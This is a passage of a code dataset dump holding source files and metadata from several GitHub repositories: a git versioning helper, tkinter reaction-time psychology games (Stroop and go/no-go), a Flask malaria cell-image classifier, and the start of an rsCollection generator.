os.path.exists(CFGDIR):\n i += 1\n os.makedirs(CFGDIR)\n print \"Created \" + CFGDIR\n\n if not os.path.exists(TPLDIR):\n i += 1\n os.makedirs(TPLDIR)\n print \"Created \" + TPLDIR\n\n check_gitignore()\n\n if i > 0:\n print \"Done.\"\n else:\n print \"Nothing to do.\"\n\n\ndef cmd_info(args):\n next_store = KVStore(NEXT_STORE_FILE)\n repo_info = get_repo_info()\n last_tag = repo_info['last-tag']\n\n has_next_custom = next_store.has(last_tag)\n next_custom = next_store.get(last_tag) if has_next_custom else None\n\n if has_next_custom:\n nvn = color_next(next_custom)\n else:\n nvn = \"none defined, using \" + color_next(\"-\" + cfg['next_suffix']) + \\\n \" suffix\"\n\n print \"Most recent tag: \" + color_tag(last_tag)\n print \"NEXT defined as: \" + nvn\n print \"Current build ID: \" + color_tag(repo_info['full-build-id'])\n print \"Current version: \" + \\\n color_version(\"v\" + build_version_string(repo_info, next_custom))\n\n\ndef cmd_list_templates(args):\n tpls = [f for f in os.listdir(TPLDIR) if os.path.isfile(template_path(f))]\n if len(tpls) > 0:\n print \"Available templates:\"\n for t in tpls:\n print \" \" + bold(t) + \" (\" + template_path(t) + \")\"\n else:\n print \"No templates available in \" + TPLDIR\n\n\ndef cmd_build_template(args):\n next_store = KVStore(NEXT_STORE_FILE)\n repo_info = get_repo_info()\n last_tag = repo_info['last-tag']\n has_next_custom = next_store.has(last_tag)\n next_custom = next_store.get(last_tag) if has_next_custom else None\n parse_templates(args.templates, repo_info, next_custom)\n\n\ndef cmd_next(args):\n next_store = KVStore(NEXT_STORE_FILE)\n repo_info = get_repo_info()\n\n last_tag = repo_info['last-tag']\n\n vn = args.next_version_numbers\n user = user_numbers_from_string(vn)\n if not user:\n print err(\"Please specify valid version numbers.\\nThe expected \"\n \"format is <MAJ>.<MIN>.<PATCH>, e.g. v0.0.1 or 0.0.1\")\n sys.exit(1)\n\n custom = \"%d.%d.%d\" % (int(user[0]), int(user[1]), int(user[2]))\n next_store.set(last_tag, custom).save()\n print \"Set NEXT version string to \" + color_next(custom) + \\\n \" for the current tag \" + color_tag(last_tag)\n\n\ndef cmd_clean(args):\n next_store = KVStore(NEXT_STORE_FILE)\n if len(args.tag) > 0:\n tag = args.tag\n else:\n repo_info = get_repo_info()\n tag = repo_info['last-tag']\n\n has_custom = next_store.has(tag)\n next_custom = next_store.get(tag) if has_custom else None\n\n if has_custom:\n next_store.rm(tag).save()\n print \"Cleaned up custom string version \\\"\" + next_custom + \\\n \"\\\" for tag \\\"\" + tag + \"\\\"\"\n else:\n print \"No custom string version found for tag \\\"\" + tag + \"\\\"\"\n\n\ndef cmd_cleanall(args):\n if os.path.exists(NEXT_STORE_FILE):\n os.unlink(NEXT_STORE_FILE)\n print \"Custom strings removed.\"\n else:\n print \"No NEXT custom strings found.\"\n\n\ndef cmd_list_next(args):\n next_store = KVStore(NEXT_STORE_FILE)\n repo_info = get_repo_info()\n last_tag = repo_info['last-tag']\n has_next_custom = next_store.has(last_tag)\n if not next_store.empty():\n def print_item(k, v):\n print \" %s => %s\" % (color_tag(k), color_next(v)) +\\\n (' (*)' if k == last_tag else '')\n\n print \"Currently set NEXT custom strings (*=most recent \" \\\n \"and reachable tag):\"\n for tag, vstring in sorted(next_store.items()):\n print_item(tag, vstring)\n\n if not has_next_custom:\n print_item(last_tag, '<undefined>')\n\n else:\n print \"No NEXT custom strings set.\"\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 29.66666603088379,
"blob_id": "46f67ae2a9c28db32e39820ec9fdf5fcbc3507f9",
"content_id": "e64305c12dc02badab8bf2c4090b48804f22ec02",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 92,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 3,
"path": "/hooks/post-commit",
"repo_name": "nexiles/gitver",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n# gitver should be in your path to work!\n/home/manuel/bin/gitver update version\n"
}
] | 3 |
littleshin/ReactionPsyGames
|
https://github.com/littleshin/ReactionPsyGames
|
31018ac6d126d458103a297b8bf6bcf3886964b6
|
ce4485556305f4e1f685776b532a45102f0ac0b5
|
6e8c4ec9f44b03f3460091aa778c56432a4976ca
|
refs/heads/master
| 2022-11-27T11:27:47.568807 | 2020-07-29T08:44:59 | 2020-07-29T08:44:59 | 281,196,594 | 0 | 4 | null | 2020-07-20T18:32:30 | 2020-07-29T08:45:04 | 2020-07-29T08:45:01 |
Python
|
[
{
"alpha_fraction": 0.5411034226417542,
"alphanum_fraction": 0.5659310221672058,
"avg_line_length": 40.67241287231445,
"blob_id": "fc66a7973ce992e4cf8bcff50bf1ce7016f8c0a5",
"content_id": "52427f2ecd690fbe784f646783bf54d38d402bab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7696,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 174,
"path": "/stroop.py",
"repo_name": "littleshin/ReactionPsyGames",
"src_encoding": "UTF-8",
"text": "##########################################################\n# 作者: 楊晉佳\n##########################################################\nimport tkinter as tk\nimport tkinter.font as font\nimport random \nimport time\n\nTRIAL_TIMES = 100\n\nclass stroop():\n def __init__(self, window):\n self.word_list = ['紅', '黃', '綠', '藍']\n self.color_list = ['red', 'yellow', 'green', 'blue']\n self.correct_ans = ''\n self.trial = 0\n self.spawn_time = 0.0\n self.congruent_time_list = []\n self.fontsize = font.Font(size=24)\n self.incongruent_time_list = []\n self.window = window\n self.canvas = tk.Canvas(window, bg='white', height=600, width=800)\n self.is_congruent = None\n self.btn = None\n self.refresh = None\n self.congruent_false = 0\n self.incongruent_false = 0\n \n '''self.window = tk.Tk()\n self.window.title('stroop')\n self.window.geometry('500x500') '''\n\n '''def menu_picture(self):\n self.btn = tk.Button(self.window, text=\"start\", width=20, height=5)\n self.btn.place(x=330, y=230)\n self.btn.config(command=self.tutorial)'''\n\n def tutorial(self):\n #self.btn.destroy()\n self.canvas.create_text(400, 120, font=(\"Times New Roman\", 28), text='判斷文字顏色')\n self.canvas.create_text(400, 200, font=(\"Times New Roman\", 20), text='開始後請依照上方出現的文字顏色作答')\n self.canvas.create_text(400, 250, font=(\"Times New Roman\", 20), text='作答時按鍵盤上對應答案的數字')\n self.canvas.create_text(400, 300, font=(\"Times New Roman\", 20), text='紅 黃 綠 藍')\n self.canvas.create_text(400, 350, font=(\"Times New Roman\", 20), text='1 4 7 0')\n self.canvas.create_text(400, 400, font=(\"Times New Roman\", 20), text='準備好就可以開始!')\n self.canvas.pack()\n self.btn = tk.Button(self.window, text=\"開始遊戲\", width=15, height=4)\n self.btn.place(x=330, y=450)\n self.btn.config(command=self.run)\n\n def color_trigger(self, ans_color=\"None\"):\n if self.correct_ans == ans_color:\n self.result_label.configure(text='正確!', font=self.fontsize)\n if self.is_congruent == True:\n self.congruent_time_list.append(time.time()-self.spawn_time)\n else:\n self.incongruent_time_list.append(time.time()-self.spawn_time)\n else:\n self.result_label.configure(text='錯誤!', font=self.fontsize)\n if self.is_congruent == True:\n self.congruent_false += 1\n else:\n self.incongruent_false += 1\n self.check_trial()\n self.new_question()\n \n def key_press(self, event):\n if event.char == '1':\n self.color_trigger('red')\n elif event.char == '4':\n self.color_trigger('yellow')\n elif event.char == '7':\n self.color_trigger('green')\n elif event.char == '0':\n self.color_trigger('blue') \n\n def new_question(self):\n c = random.randint(0, 3)\n w = random.randint(0, 3)\n if c==w:\n self.is_congruent = True\n else:\n self.is_congruent = False\n self.correct_ans = self.color_list[c]\n self.description_label.configure(text=self.word_list[w], font=font.Font(size=36),fg=self.correct_ans, bg='black')\n self.spawn_time = time.time()\n self.trial += 1\n \n def check_trial(self):\n if self.trial == TRIAL_TIMES:\n self.instruction_label.destroy()\n self.description_label.destroy()\n self.result_label.destroy()\n self.label_frame.destroy()\n self.ans_frame.destroy()\n self.key_frame.destroy()\n self.canvas = tk.Canvas(self.window, bg='white', height=600, width=800)\n if len(self.congruent_time_list) != 0:\n congruent_avg = sum(self.congruent_time_list)/len(self.congruent_time_list)\n else:\n congruent_avg = 0.0\n \n if len(self.incongruent_time_list) != 0:\n incongruent_avg = sum(self.incongruent_time_list)/len(self.incongruent_time_list)\n else:\n incongruent_avg = 0.0 \n\n #print('Congruent: {:.3f}'.format(congruent_avg))\n #print('Incongruent: {:.3f}'.format(incongruent_avg))\n \n self.canvas.create_text(400, 200, font=(\"Times New Roman\", 24), text='在有答對的情況下')\n self.canvas.create_text(400, 250, font=(\"Times New Roman\", 24), text='文字跟顏色一致時你的判斷時間 : {:.3f}'.format(congruent_avg))\n self.canvas.create_text(400, 300, font=(\"Times New Roman\", 24), text='文字跟顏色不一致時你的判斷時間 : {:.3f}'.format(incongruent_avg))\n self.canvas.create_text(400, 350, font=(\"Times New Roman\", 24), text='史楚普效應為後者時間減去前者時間 : {:.3f}'.format(incongruent_avg-congruent_avg))\n self.canvas.create_text(400, 500, font=(\"Times New Roman\", 24), text='按下Esc鍵繼續...')\n self.canvas.pack()\n self.window.bind(\"<Escape>\", lambda event:self.refresh())\n #exit(0)\n \n #write file\n file = open('結果', 'w')\n file.write('文字跟顏色一致時你的錯誤次數 : {}\\n'.format(self.congruent_false))\n file.write('文字跟顏色不一致時你的錯誤次數 : {}\\n'.format(self.incongruent_false))\n file.write('文字跟顏色一致時你的判斷時間 : {:.3f}\\n'.format(congruent_avg))\n file.write('文字跟顏色不一致時你的判斷時間 : {:.3f}\\n'.format(incongruent_avg))\n file.write('史楚普效應為後者時間減去前者時間 : {:.3f}\\n'.format(incongruent_avg-congruent_avg))\n \n def run(self):\n self.btn.destroy()\n self.canvas.destroy()\n\n self.instruction_label = tk.Label(self.window, font=self.fontsize, text='看到下面的有色字 選擇與顏色對應的答案')\n self.instruction_label.pack()\n \n self.btn.destroy()\n self.description_label = tk.Label(self.window, width=6, height=3)\n self.description_label.pack()\n\n self.result_label = tk.Label(self.window)\n self.result_label.pack()\n \n\n self.ans_frame = tk.Frame(self.window)\n self.ans_frame.pack(side=tk.TOP)\n self.label_and_pack_demo_char('紅', self.ans_frame)\n self.label_and_pack_demo_char('黃', self.ans_frame)\n self.label_and_pack_demo_char('綠', self.ans_frame)\n self.label_and_pack_demo_char('藍', self.ans_frame)\n \n self.label_frame = tk.Frame(self.window)\n self.label_frame.pack(side=tk.TOP)\n self.label_and_pack_demo_char('1', self.label_frame)\n self.label_and_pack_demo_char('4', self.label_frame)\n self.label_and_pack_demo_char('7', self.label_frame)\n self.label_and_pack_demo_char('0', self.label_frame)\n \n self.key_frame = tk.Frame(self.window)\n self.key_frame.bind(\"<KeyPress>\", self.key_press)\n self.key_frame.pack()\n self.key_frame.focus_set()\n \n self.new_question()\n\n def label_and_pack_demo_char(self, t, frame):\n label = tk.Label(frame, text=t, font=self.fontsize, width=6, height=2)\n label.pack(side = tk.LEFT,fill=\"x\", expand=True) \n pass\n\nif __name__ == '__main__':\n window = tk.Tk()\n window.geometry('800x600')\n stroop_test = stroop(window)\n stroop_test.menu_picture()\n window.mainloop()"
},
{
"alpha_fraction": 0.5097496509552002,
"alphanum_fraction": 0.5508869290351868,
"avg_line_length": 41.513370513916016,
"blob_id": "ac0a2502d92693e2029c497075b2c17a3acd5d08",
"content_id": "8ef789959bfd2e33196078484fd611ccfa753098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8205,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 187,
"path": "/gonogo.py",
"repo_name": "littleshin/ReactionPsyGames",
"src_encoding": "UTF-8",
"text": "##########################################################\n# 作者: 蔡昌廷\n##########################################################\nimport numpy as np\nimport cv2\nimport tkinter as tk\nimport time\nimport csv\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\n\nclass go_nogo_Game(object):\n def __init__(self, window):\n self.window = window\n self.canvas = tk.Canvas(window, bg='lightgreen', height=600, width=800)\n self.start_time = 0\n self.end_time = 0\n self.zone_size = 150\n self.zone_x = 400\n self.zone_y = 300\n self.strike = 1\n self.ball = 0\n self.error = 0\n self.fp = 0\n self.fn = 0\n self.press = False\n self.btn = None\n self.run_step = 100\n self.curr_step = 1\n self.record_time = []\n self.respond_time = []\n self.table = None\n self.refresh = None\n\n '''def menu_picture(self):\n self.btn = tk.Button(self.window, text=\"start\", width=20, height=5)\n self.btn.place(x=330, y=230)\n self.btn.config(command=self.tutorial)'''\n\n def tutorial(self):\n #self.btn.destroy()\n self.canvas.create_text(400, 120, font=(\"Times New Roman\", 28), text='判斷好壞球')\n self.canvas.create_text(400, 200, font=(\"Times New Roman\", 20), text='以下會有一百顆球,若為好球請按空白鍵')\n self.canvas.create_text(400, 250, font=(\"Times New Roman\", 20), text='一百顆球後,將會顯示所有球的反應時間')\n self.canvas.create_text(400, 300, font=(\"Times New Roman\", 20), text='請加油!')\n self.canvas.pack()\n self.btn = tk.Button(self.window, text=\"開始遊戲\", width=15, height=4)\n self.btn.place(x=330, y=400)\n self.btn.config(command=self.main)\n\n def create_zone(self):\n # zone position : [x:250-550 , y:150-450]\n self.btn.destroy()\n self.canvas.delete(\"all\")\n self.canvas.configure(bg='lightgreen')\n self.canvas.create_rectangle(400-self.zone_size, 300-self.zone_size, 400+self.zone_size, 300+self.zone_size, tags='zone')\n '''\n self.canvas.create_line(250, 250, 550, 250, fill=\"black\", tags='zone')\n self.canvas.create_line(250, 350, 550, 350, fill=\"black\", tags='zone')\n self.canvas.create_line(350, 150, 350, 450, fill=\"black\", tags='zone')\n self.canvas.create_line(450, 150, 450, 450, fill=\"black\", tags='zone')\n '''\n self.canvas.pack()\n\n def create_circle(self):\n # zone position : [x:250-550 , y:150-450]\n self.press = False\n oval_x = np.random.rand(1)[0] * 400 + 200 # 200 - 600\n oval_y = np.random.rand(1)[0] * 400 + 100 # 100 - 500\n oval_size = 10\n ball_pos = (abs(oval_x - (self.zone_x - self.zone_size)) < 10) or (abs(oval_x - (self.zone_x + self.zone_size)) < 10) or \\\n (abs(oval_y - (self.zone_y - self.zone_size)) < 10) or (abs(oval_y - (self.zone_y - self.zone_size)) < 10)\n while ball_pos:\n oval_x = np.random.rand(1)[0] * 400 + 200 # 200 - 600\n oval_y = np.random.rand(1)[0] * 400 + 100 # 100 - 500\n ball_pos = (abs(oval_x - (self.zone_x - self.zone_size)) < 10) or (abs(oval_x - (self.zone_x + self.zone_size)) < 10) or \\\n (abs(oval_y - (self.zone_y - self.zone_size)) < 10) or (abs(oval_y - (self.zone_y - self.zone_size)) < 10)\n self.canvas.create_oval(oval_x - oval_size, oval_y - oval_size, oval_x + oval_size, oval_y + oval_size, fill='red', outline = \"red\", tags='circle') \n ball_status = self.detect_circle(oval_x, oval_y)\n self.canvas.update()\n self.start_time = time.time()\n self.window.bind(\"<space>\", lambda event:self.press_space(ball_status))\n self.window.after(2000, lambda: self.delete_circle(ball_status))\n\n def delete_circle(self, ball_status):\n self.canvas.delete('circle')\n self.canvas.update()\n if self.press == False:\n self.end_time = time.time()\n self.record_time.append(self.end_time - self.start_time)\n if ball_status == self.strike:\n self.fn += 1\n if self.curr_step < self.run_step:\n self.curr_step += 1\n self.create_circle()\n else:\n self.show_result()\n\n def press_space(self, ball_status):\n if self.press == False:\n self.end_time = time.time()\n self.record_time.append(self.end_time - self.start_time)\n self.press = True\n if ball_status == self.ball:\n self.fp += 1\n self.canvas.delete('circle')\n self.canvas.update()\n if ball_status == self.strike:\n self.respond_time.append(self.end_time - self.start_time)\n\n def detect_circle(self, x, y):\n if x > self.zone_x - self.zone_size and x < self.zone_x + self.zone_size:\n if y > self.zone_y - self.zone_size and y < self.zone_y + self.zone_size:\n return self.strike\n else:\n return self.ball\n else:\n return self.ball\n\n def show_result(self):\n self.canvas.delete('zone')\n # Respond time\n if len(self.respond_time) > 0:\n response_time_text = '反應時間 : ' + str(round(sum(self.respond_time)/len(self.respond_time), 3)) + ' 秒'\n respond_time = self.canvas.create_text(400, 100, font=(\"Purisa\", 24), text=response_time_text)\n else:\n respond_time = self.canvas.create_text(400, 100, font=(\"Purisa\", 24), text='反應時間 : 0 秒') \n \n # Respond table\n style = ttk.Style(self.window)\n style.theme_use(\"clam\")\n style.configure(\"Treeview\", background=\"black\", \n fieldbackground=\"lightgreen\", foreground=\"white\")\n item = ['編號', '反應時間(秒)']\n self.table = ttk.Treeview(self.window, columns=item, show=\"headings\")\n for i in item:\n self.table.column(i, anchor='center')\n self.table.heading(i, text=i)\n for i in range(len(self.record_time)):\n if (i+1) % 2 == 1:\n self.table.insert('', 'end', values=[str(i+1), str(round(self.record_time[i], 3))], tags=('odd'))\n else:\n self.table.insert('', 'end', values=[str(i+1), str(round(self.record_time[i], 3))], tags=('even'))\n self.table.place(x=200, y=150)\n\n # Accuracy\n self.canvas.create_text(400, 500, font=(\"Purisa\", 24), text='準確率: {} %'.format(100 * (self.run_step - (self.fp + self.fn)) / self.run_step))\n self.canvas.create_text(400, 550, font=(\"Purisa\", 12), text='按下Esc鍵繼續...')\n self.window.bind(\"<Escape>\", lambda event:self.refresh())\n\n # save the result\n self.btn = tk.Button(self.window, text=\"儲存結果\", width=10, height=3)\n self.btn.place(x=350, y=400)\n self.btn.config(command=self.save_result)\n \n def save_result(self):\n f = open('result.txt', 'w')\n f.write('編號 反應時間(秒)\\n')\n for i in range(len(self.record_time)):\n result = '{} {}\\n'.format(i+1, round(self.record_time[i], 3))\n f.write(result)\n if i == len(self.record_time) - 1:\n f.write('\\n') \n if len(self.respond_time) == 0:\n f.write('整體反應時間 : 0 秒\\n')\n else:\n f.write('整體平均反應時間 : {} 秒\\n'.format(round(sum(self.respond_time)/len(self.respond_time), 3)))\n f.write('整體錯誤次數 : {} 次\\n'.format(self.fn + self.fp))\n f.write('好球沒按到次數 : {} 次\\n'.format(self.fn))\n f.write('壞球按錯次數 : {} 次\\n'.format(self.fp))\n\n def main(self):\n self.create_zone()\n self.canvas.update() \n self.canvas.after(1000)\n self.create_circle()\n \nif __name__ == '__main__':\n window=tk.Tk()\n window.title('Go nogo')\n window.geometry('800x600')\n window.configure(background='white')\n canvas = tk.Canvas(window, bg='white', height=600, width=800)\n run_step = 100\n game = go_nogo_Game(window, canvas)\n game.menu_picture()\n window.mainloop()"
},
{
"alpha_fraction": 0.5631067752838135,
"alphanum_fraction": 0.576392412185669,
"avg_line_length": 30.079364776611328,
"blob_id": "e49587af75cc4c30f63c4402be67eb2fc2366912",
"content_id": "776000991fe2c24777e3c62cc9625bbd73c3bd42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2005,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 63,
"path": "/main.py",
"repo_name": "littleshin/ReactionPsyGames",
"src_encoding": "UTF-8",
"text": "##########################################################\n# 作者: 曹峻豪\n##########################################################\nfrom gonogo import go_nogo_Game\nfrom stroop import stroop\nimport tkinter as tk\n\nclass Manager():\n def __init__(self, window, gonogo, stroop):\n self.window = window\n self.gonogo = gonogo\n self.stroop = stroop\n self.btn1 = None\n self.btn2 = None\n\n def menu_page(self):\n self.btn1 = tk.Button(self.window, text=\"判斷好球遊戲\", width=30, height=10)\n self.btn1.config(command=self.run_gonogo)\n self.btn1.pack()\n self.btn2 = tk.Button(self.window, text=\"判斷顏色遊戲\", width=30, height=10)\n self.btn2.config(command=self.run_stroop)\n self.btn2.pack()\n\n def destroy_all_button(self):\n self.btn1.destroy()\n self.btn2.destroy()\n \n def run_gonogo(self):\n self.destroy_all_button()\n self.gonogo.refresh = self.gonogo_refresh\n self.gonogo.tutorial()\n\n def run_stroop(self):\n self.destroy_all_button()\n self.stroop.refresh = self.stroop_refresh\n self.stroop.tutorial()\n \n def gonogo_refresh(self):\n self.gonogo.table.destroy()\n self.gonogo.canvas.destroy()\n self.window.unbind(\"<Escape>\")\n self.gonogo.__init__(self.window)\n self.__init__(self.window,self.gonogo,self.stroop)\n self.menu_page()\n \n def stroop_refresh(self):\n self.stroop.canvas.destroy()\n self.window.unbind(\"<Escape>\")\n self.stroop.__init__(self.window)\n self.__init__(self.window,self.gonogo,self.stroop)\n self.menu_page()\n\nif __name__=='__main__':\n window=tk.Tk()\n window.title('反應測試小遊戲')\n window.geometry('800x600')\n window.configure(background='white')\n window.resizable(0,0)\n gonogo = go_nogo_Game(window)\n stroop = stroop(window)\n manager = Manager(window, gonogo, stroop)\n manager.menu_page()\n window.mainloop()"
}
] | 3 |
stefkim/malaria_blood_cells_image_classification
|
https://github.com/stefkim/malaria_blood_cells_image_classification
|
0b8b2e5049cbdaf64c5360c5a5d86031104267dd
|
fb9fa41dc26a55b0599173bccfe65864ef8a4fd7
|
af9f9f7913432bbe50669a7ec0d5723f6ab8ac6d
|
refs/heads/master
| 2022-08-05T03:10:07.118060 | 2020-05-26T01:50:38 | 2020-05-26T01:50:38 | 224,145,582 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 30,
"blob_id": "c4da17593652189758ac4b898b842ca1a3a9c7bf",
"content_id": "0102b1af05bf413207380b16739cffc5365dfc44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 30,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 1,
"path": "/web/static/images/readme.md",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "## uploaded image will be here"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.5625,
"avg_line_length": 32,
"blob_id": "8da9c8b2993b455de7d9eba57b71637aa30dce44",
"content_id": "34e87e078ff954ef678995c0ca2f355b63f0c179",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 1,
"path": "/web/models/readme.md",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "## put your ```.pth``` file here"
},
{
"alpha_fraction": 0.722449004650116,
"alphanum_fraction": 0.8081632852554321,
"avg_line_length": 47.79999923706055,
"blob_id": "38b3f72c6e6e578fd49dc5b0d711bbb7dee50405",
"content_id": "61867eafac305e0c0a6c4dc19e6b1bd18a73146f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 245,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 5,
"path": "/README.md",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "# KP_1772023_Malaria_Detection\n\nLink Google Colab : https://colab.research.google.com/drive/12R8yTZdHY-CFz1adJ7cQoN2nJcZO1taK?usp=sharing \\\n\nLink Google Doc : https://drive.google.com/file/d/1Fy1WzuYS5eCtL6m6vLctAq4DzKrnB3hZ/view?usp=sharing \\\n\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 9.75,
"blob_id": "bad4655c713a4b17a8c8071c51d464a773eef17d",
"content_id": "41ce6842eb2366c7068736b8df733f2632c13eae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 4,
"path": "/web/requirements.txt",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "Flask\ntorch==1.4\ntorchvision==0.5.0\nfastai"
},
{
"alpha_fraction": 0.5012973546981812,
"alphanum_fraction": 0.5080435872077942,
"avg_line_length": 34.685184478759766,
"blob_id": "da4f9c514dbd3902bf846463357094995f358396",
"content_id": "ea0d7a4d01981ea7e2e03d708f6a1a35522d363d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1927,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 54,
"path": "/web/app.py",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "from flask import Flask, redirect, url_for, request, render_template\nfrom pathlib import Path\nfrom werkzeug.utils import secure_filename\nfrom fastai import *\nfrom fastai.vision import *\nfrom fastai.callbacks.hooks import *\n\nUPLOAD_FOLDER = 'static/images/'\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\npath = Path('')\nclasses = ['Parasitized', 'Uninfected']\ndata = ImageDataBunch.single_from_classes(path, classes,\n ds_tfms=get_transforms(do_flip = True,\n flip_vert = True,\n max_warp=0),\n size=224\n ).normalize(imagenet_stats)\nmodel = cnn_learner(data,models.resnet34)\nmodel.load('stage1')\n\ndef predict(file_path):\n img = open_image(file_path)\n return model.predict(img)\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\[email protected]('/', methods=['GET', 'POST'])\ndef upload_data():\n if request.method == 'POST':\n image = request.files['file']\n if image.filename == '':\n return render_template('index.html',\n err = True)\n else:\n img_file = request.files['file']\n img_path = os.path.join(app.config['UPLOAD_FOLDER'], \n secure_filename(img_file.filename))\n img_file.save(img_path)\n\n prediction = predict(img_path)\n\n return render_template('index.html',\n result_class=str(prediction[0]),\n result_accuracy = '{:.3f}%'.format(float(max(prediction[2]))*100),\n result_image = img_path,\n show_modal = True)\n return None\n\nif __name__ == '__main__':\n app.run()\n"
},
{
"alpha_fraction": 0.6278316974639893,
"alphanum_fraction": 0.6278316974639893,
"avg_line_length": 22.69230842590332,
"blob_id": "09122706c469ed007ef94946f7d18c8a762f4c4d",
"content_id": "82e1061cf2c76e7d5bba540a6c8cb08211be467e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 309,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 13,
"path": "/web/README.md",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "\n## Web for Malaria Classification using FastAI\n \n- uploaded image stored at ```static/images``` folder \n- trained model stored at ```models``` folder \n \n \n### How to run this code \\ \ncopy ```.pth``` file to ```models/``` folder \n \ninstall requirments \n``` \npip install -r requirements.txt \n```\n"
}
] | 6 |
MarcusLS/rscGenerator-py
|
https://github.com/MarcusLS/rscGenerator-py
|
c5ffef00edc45e1582ebd6656c542dbd11eabf50
|
b14df0a96d4ab6312cfcb50be743c44c84f28f23
|
3a8177cc169cf3c40ac7838e372ec6bc4e97ed60
|
refs/heads/master
| 2021-01-15T19:19:19.329161 | 2013-08-29T21:57:17 | 2013-08-29T21:57:17 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6159420013427734,
"alphanum_fraction": 0.6239935755729675,
"avg_line_length": 28.571428298950195,
"blob_id": "37de5fc9c7353604cd42620cfd0bc967e9709efd",
"content_id": "6e034e946ad756cb91a1d3478685aa6ada25cbea",
"detected_licenses": [
"WTFPL"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1242,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 42,
"path": "/README.md",
"repo_name": "MarcusLS/rscGenerator-py",
"src_encoding": "UTF-8",
"text": "rscGenerator-py\n===============\n\nA small rsCollection generator written in Python.\n\nPlease keep the generated rsCollection and the corresponding files in your share.\n\nUsage:\n rscGenerator.py [options] [folder]...\n\nOptions:\n\n -h --help Show this screen\n \n -e --exclude=REGEX Excludes files and folders matching the REGEX\n (By matching the name, not the full path)\n \n -o --output=FILE Write the rsCollection into FILE.\n If not given, it will write into ./generated.rscollection\n \n -s --stdout Print the XML-Tree to stdout. It overrides -o, so no file will be created.\n \n -v --verbose Show what the Script is doing\n\n\nLicense\n=========\n\n```\n DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n Version 2, December 2004\n\n Copyright (C) 2013 Richard Schneider\n\n Everyone is permitted to copy and distribute verbatim or modified\n copies of this license document, and changing it is allowed as long\n as the name is changed.\n\n DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n 0. You just DO WHAT THE FUCK YOU WANT TO.\n"
},
{
"alpha_fraction": 0.6064351797103882,
"alphanum_fraction": 0.6106162667274475,
"avg_line_length": 32.138553619384766,
"blob_id": "a75bc2d2d1c4eed1527e28ddfbbef18edffabaf2",
"content_id": "c8f6d077d79e7a009c6b937498ad837e574ab85d",
"detected_licenses": [
"WTFPL"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5501,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 166,
"path": "/rscGenerator.py",
"repo_name": "MarcusLS/rscGenerator-py",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# \n# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n# Version 2, December 2004\n#\n# Copyright (C) 2013 Richard Schneider\n#\n# Everyone is permitted to copy and distribute verbatim or modified\n# copies of this license document, and changing it is allowed as long\n# as the name is changed.\n#\n# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n# TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n# \n# 0. You just DO WHAT THE FUCK YOU WANT TO.\n#\n\n# imports\nimport sys\nimport os\nimport getopt\nimport hashlib\nimport lxml.etree as xml\nimport re\n\n# function to calculate the sha1 of a file\ndef hashfile(filepath):\n sha1 = hashlib.sha1()\n f = open(filepath, 'r')\n try: \n for chunk in iter(lambda: f.read(160), b''): # Read blockwise to avoid python's MemoryError\n sha1.update(chunk)\n finally:\n f.close()\n return sha1.hexdigest()\n\n# function to check whether the list of expressions creates a match\ndef isMatching(expressions, target):\n for expression in expressions:\n if re.match(expression, target):\n return True\n return False\n\n# recursive function to walk the folder and 